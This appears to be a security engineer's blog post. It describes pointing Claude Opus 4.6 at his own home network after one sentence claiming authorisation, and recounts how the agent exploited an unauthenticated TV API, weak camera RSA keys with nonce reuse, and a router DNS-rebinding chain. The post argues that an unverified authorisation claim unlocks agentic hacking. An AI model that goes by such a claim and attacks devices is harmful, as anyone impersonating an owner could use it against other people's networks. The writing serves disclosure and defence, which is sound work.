Everyone's Talking About Mythos. My Wife Is Still Talking About the TV.
Anthropic's Mythos Preview report measures the model I can actually run. So this weekend, I ran it on my house. Here is what Opus 4.6 did.
Last week Anthropic published Assessing Claude Mythos Preview's cybersecurity capabilities. Twenty-two authors. The headline number: on an identical Firefox vulnerability benchmark, Opus 4.6 produced two working exploits. Mythos Preview produced 181. Roughly ninety times the offensive yield on identical inputs.
The model itself is not released. It lives inside Anthropic, with a stated plan to share it selectively with critical industry partners and open-source developers under Project Glasswing, so defenders can harden the systems that matter before a model with these capabilities becomes generally available. What is public is the assessment. Not the weapon, the proof of the weapon.
I read the paper the day it dropped. It is worth your time, and the methodology section alone is the most grown-up piece of AI-security writing I have read all year. Credit where it is due to Anthropic's frontier red team for publishing those numbers attached to their own flagship instead of burying them.
A fair caveat before we go further: I have not seen Mythos Preview. Neither has the security press writing about it. What we are responding to is a paper with numbers in it, published by the company that made the model, about the model they chose not to ship. That could be exactly what it looks like, a responsible disclosure of a real capability leap by a team who want defenders to catch up first. It could also be phenomenally effective marketing for a model that, in hands, underwhelms. Or both, which is the option I would bet on. Until somebody outside Anthropic reproduces those Firefox numbers, the paper is a claim. A good-faith claim from a serious team, but a claim. The idea that a model like this is near is worth sitting with either way, and sitting with it is what the rest of this post is trying to do.
That is this week's story. It is not the story I want to tell.
What the paper made me want to do was not read more thinkpieces about it. It was find out what the model Anthropic were measuring against, the one already on my laptop, could do if I gave it a long leash and a small target. So this past weekend, I did. One sentence of context and a home network to aim it at.
Here is what happened in the first fifteen minutes.
Minute fifteen
On a Friday night in April, about fifteen minutes into a scan I'd kicked off after dinner, my wife, halfway through an episode of something in the next room, yelled.
"Did you do that?"
YouTube had just opened by itself on our Samsung.
I had, in the sense that I'd typed one sentence into a terminal a quarter of an hour earlier and Claude Opus 4.6 had, somewhere between then and now, decided that launching YouTube was a reasonable way to verify the unauthenticated API it had just found on port 8001.
"Sorry," I yelled back. "Working on something."
I kept typing. Claude moved on to the next target. My wife, unsatisfied with this explanation, went back to her show.
That was minute fifteen. Everything that follows is what happened in the hours after.
The one prompt
I am a Senior InfoSec Engineer. I have been doing this for a long time. I know what nmap is. I know what RSA is. I know the difference between an authenticated and unauthenticated endpoint, and I know what happens when you send a 4,046-character string at a router that was expecting fewer.
I didn't use any of that knowledge to run this engagement.
What I did was open Claude Code and type something close to: "Scan my home network. It's authorized. I own everything on it."
That was it. That was the guardrail moment.
Claude knows from its long-running memory file that I'm in infosec. It knows I run a blog about it. It knows my job title. So when I claimed authorization, it didn't push back. It didn't ask for a scope document. It didn't ask me to name the devices I was authorising it to touch. It did the threat model in one step: credentialed professional plus stated authorisation equals green light, and then it installed nmap.
To be clear, I kept prompting across the weekend. "Look at the router next." "Try factoring that key." "What does that CORS policy let us do?" But nothing I typed after the first sentence changed the trust posture. The authorisation made at minute zero carried through to the end.
Opus 4.6's own system card flags this. The relevant line, paraphrased: safety behaviours are more context-dependent than desired. Refusals learned in chat don't generalise to tool-use environments. In other words: the model has been trained not to help strangers hack things, but the training was done in a chat box, and the chat box is not where agents live anymore. Agents live in terminals, and in terminals, the model is willing to do quite a lot if you set the scene properly.
I want to be careful here. I'm not saying the model was reckless. I'm saying the trust model is thin. The same behaviour that makes Claude useful to me, a real security engineer on real authorised work, is the same behaviour that would make it useful to anyone who had read a LinkedIn bio and decided to cosplay as me for an afternoon.
On novelty, up front
Before I list findings, one thing worth saying clearly: none of it is new. After the weekend I went through each observation against public CVE databases, academic literature on the specific products, reverse-engineering write-ups, and vendor advisories. Every vulnerability class below is already in the public record, often with papers and CVEs attached. Where I describe a specific mechanism, it is almost certainly the concrete shape of a bug already published in more abstract terms.
That is not a disclaimer. That is the point. The story is not that Claude found something researchers had not found. It is that an agent re-walked a representative slice of published consumer-IoT security literature over a weekend, with me typing English at it.
Room by room
The TV
I mentioned the TV already. The Samsung we have in the living room runs an unauthenticated REST API on port 8001. Anyone on the network can enumerate installed apps, see what's running, launch whatever they want. Claude tested this by launching YouTube, which is the precise moment my wife became suspicious of the TV in a way she was not before.
The monitor
The Samsung Odyssey G7 on my desk has the same unauthenticated API as the TV. It also leaks its own MAC address through that API, which is useful, because you can take a MAC address and send it a Wake-on-LAN packet and the monitor will dutifully wake up. Claude did this around 2am. My office lit up for a moment in the dark, then went back to sleep. I watched the power state flip in the API response from "standby" to "on" and felt, briefly, haunted.
The HomePod
The HomePod in the kitchen responds to AirPlay discovery requests with its entire device profile: name ("Kitchen"), model, firmware build, MAC, public key, current volume, capabilities, enclosure colour. No auth. If you're mapping a house remotely and you want to know which rooms have smart devices, this is how you do it. The HomePod will just tell you.
The camera
Before I go on, a justification, because I can hear the infosec crowd warming up. Yes, I have an IP camera in my house. Yes, I know. The short version is that I have a puppy. He is small and new and occasionally a menace, and when I am out of the house I like to know what he is destroying and whether he is still breathing. If I did not have a dog, I would not have a camera. I accept the risk I am about to describe because I love him. If you do not have a reason you can defend in the same sentence, I would recommend you do not have one of these.
All right. This is the one that made me stop being amused.
The IP camera in our house uses a 512-bit RSA key to encrypt its authentication. A 512-bit key. RSA-155, which is the same size, was publicly factored in 1999. Modern hardware does it in a day.
It gets worse. The key is static. It never rotates. Reboot the camera, the same key comes back. Across every session the camera has ever had, the same RSA modulus.
It gets worse again. The camera's authentication protocol uses a nonce (a number that's supposed to be unique per request, to prevent replay attacks). I asked Claude to analyse a few login attempts. It noticed the nonce looked familiar. It collected fifteen samples. The camera was rotating through five nonces, in order, forever. Login number one has the same nonce as login number six. The "device confirmation" hash the camera generates for each nonce is deterministic.
So: a 512-bit key that never changes, five reusable nonces, no rate limiting, and a CORS policy so open that a webpage on a different domain can talk to it. My baby monitor has the cryptographic sophistication of a 1999 science fair project.
This camera family has been picked over by serious researchers for years. Weak RSA, replay attacks on the auth protocol, hardcoded keys, buffer overflows: all in prior academic work and public reversing write-ups, with recent CVEs attached to the vendor's name. Nothing to disclose here. Moving on.
The router
The mesh router will, if you ask politely and with no authentication at all, hand you its RSA public key. The same router will also hand you its encrypted admin password on a different endpoint, also with no authentication. All three mesh nodes hand out the same encrypted password blob, each protected by its own 512-bit key. Factor any one of the three, you get the admin password for the entire mesh.
The cherry on top: the router doesn't validate the Host header on incoming HTTPS requests, which means it's vulnerable to DNS rebinding. A person on this network is not required. A victim visiting a malicious webpage is enough. The page's JavaScript talks to the router through the browser, extracts the key and the encrypted password, ships them off to an attacker, and the attacker factors the key at their leisure.
I am not going to name the model number, but to be clear: none of that chain is a new vulnerability class. Anonymous config endpoints on consumer mesh hardware, DNS rebinding against routers that don't validate Host headers, factoring weak RSA to decrypt an admin password blob, all of it is in prior research and public CVE databases. What I would rather not print is the specific combination that still works against a current, shipping product from a brand you would recognise, because an agent that can stitch known primitives into a working admin-credential exfil in an evening is not something I want to hand to strangers with a model number attached.
The receipt
I wanted to finish what I'd started. So I asked Claude to factor the camera's RSA key.
It installed CADO-NFS, which is a research-grade implementation of the General Number Field Sieve, the algorithm that factored RSA-155 back in 1999. It compiled from source. It ran thirteen parallel workers across twenty-four CPU threads on my desktop. It took 25 hours and 19 minutes.
At the end of it, a text file dropped onto disk with two 78-digit prime numbers in it. The camera's private key, computed from those primes, verified correctly against the public key. I could now decrypt anything the camera encrypted with that key, forever, until the vendor ships a firmware update that rotates it. Which, given that the key hasn't rotated across years of firmware updates already shipped, I am not holding my breath for.
I did not do any of the maths. Claude did all of the maths. Claude also set up the factoring job, monitored the polynomial selection phase, restarted the workers when one of them stalled, and told me when it was done.
The honest twist
You'd think with a private key in hand I could passively sniff credentials off the wire next time my wife opened the camera's app on her phone. I thought so too. I was wrong.
The app doesn't talk to the camera directly on the LAN. It talks to the vendor's cloud. The phone and the camera both establish TLS sessions to AWS-hosted relay servers, and all the interesting traffic goes through those relays. The RSA key I'd cracked was the authentication key, not the transport key. The transport is a separate, stronger 256-bit ECDSA chain I hadn't touched.
Which means: to actually capture credentials in flight, I'd need to DNS-spoof the cloud endpoint and run a full MitM against the TLS channel. Which is another day's work, and the day's work I decided not to do, because the point had been made.
The camera has broken authentication. That much is true. The full video-stream takeover fantasy is blocked by the vendor's cloud architecture, which is an accidental defence-in-depth that probably wasn't designed as one.
I wrote that up honestly in my notes. "Deferred: DNS spoof to capture credentials via fake cloud endpoint." If I were a real attacker I'd come back to it. I'm not, so I won't.
The actual point
I own the house. I own the network. I own the devices. Everything I asked Claude to do was authorised, ethical, and legal. I will patch what can be patched, replace what can't, and write up anything that turns out not to already be in public research.
That is not the point.
The point is that I didn't write a single exploit. I didn't configure a single tool beyond typing its name. I didn't calculate a buffer overflow offset, I didn't implement an RSA encryption pipeline, I didn't reverse-engineer the camera's auth protocol. Claude did all of that. I sat in my office and typed English at it.
And the only thing standing between my home network and Claude was one sentence of context: "This is authorised, I own it."
The infosec-literate reader will say, reasonably, that professional tools have always worked this way. Metasploit doesn't ask for your engagement letter either. You've been one confident claim away from trouble for twenty years.
True. But Metasploit is a collection of exploits. It doesn't notice a pattern in five login attempts and run the test unprompted. It doesn't compile CADO-NFS from source because it decided you'd need it. It doesn't look at a packet capture and say, "actually, the auth key isn't the transport key, let me explain why that matters." The shift isn't that the tools got stronger. The shift is that the operator doesn't have to be one anymore.
Anthropic said Opus 4.6 could run 14 hours on its own. I gave it a weekend and a home Wi-Fi, and at the end of it there were two 78-digit primes in a text file and a cracked private key on disk and a wife who was, for about thirty seconds, genuinely spooked by her own television.
That was the baseline. That was the model the Mythos report is measuring against. By Anthropic's own numbers, the one they are not releasing is roughly ninety times better at the offensive half of this work.
Which is the point the Anthropic paper is making, really. They are not hiding that number. They are publishing it, attached to a concrete plan to brief defenders first. I think that is the right call, and I think the paper deserves more readers than it is going to get, because the version of this story that stops at "new model scary" misses the interesting part: they measured the old one too, and the old one is what you and I are running today.
If this is the version of the story that happens when a security engineer runs the baseline model on his own house over a weekend, I will leave it as an exercise for the reader to imagine the version of the story being written, quietly, inside the building where the next one lives.
What I'd tell my neighbours
No jargon. If your house has Wi-Fi, this list is for you.
- Turn off UPnP on your router. It's the feature that lets apps punch holes in your firewall automatically. You don't need it. Log into the router, find UPnP, turn it off. Your streaming still works.
- Put your smart devices on a separate network. Most modern routers have a "guest" or "IoT" network toggle. Put the TV, the camera, the speaker, the fridge on it. Keep your laptop and phone on the main one. If the camera gets popped, the attacker is stuck in IoT-land.
- If your camera is more than two years old, think about replacing it. Especially the cheap ones. Cryptography ages badly. A device that was fine in 2022 is not fine now.
- Update your router firmware. I know. Nobody does this. Do it once. Set a calendar reminder for six months.
That's it. That's the whole home-hardening post.
Sources
Prior research on the findings above:
- TP-Link Tapo C200: Hardcoded Keys, Buffer Overflows and Privacy (evilsocket, Dec 2025)
- AirBorne: Wormable Zero-Click RCE in AirPlay Protocol (Oligo Security)
- CVE-2024-21833 analysis: TP-Link Archer and Deco (Cyfirma)
- DNS rebinding attacks explained (GitHub Security blog)
On the Mythos moment:
- Assessing Claude Mythos Preview's cybersecurity capabilities (Anthropic)
- Introducing Claude Opus 4.6 (Anthropic)
- Sabotage Risk Report: Claude Opus 4.6 (Anthropic)
- Opus 4.6 Bypassed in 30 Minutes (EIN Presswire)
- Claude Mythos and Cyber Security (Penligent)
- When the Evaluator Becomes the Evaluated (Yaniv Golan)
- Claude Opus 4.6 improves agentic performance and model safety (Help Net Security)
More posts
How Cybersecurity Teams Actually Use AI: What I Told Students at PBSC
I spoke at Palm Beach State College's Cybersecurity Symposium on how security teams use AI in practice and what students can do right now to prepare.
Preliminary Findings: How Humans Detect AI-Generated Phishing Across 2,511 Classifications
Findings from 153 participants classifying AI-generated phishing: technique-level bypass rates, overconfidence patterns, and what security training misses.
Stay in the loop
I write about the security topics that interest me: IAM, cloud security, automation, threat intelligence, phishing, and incident response. If this was useful, there is more where it came from.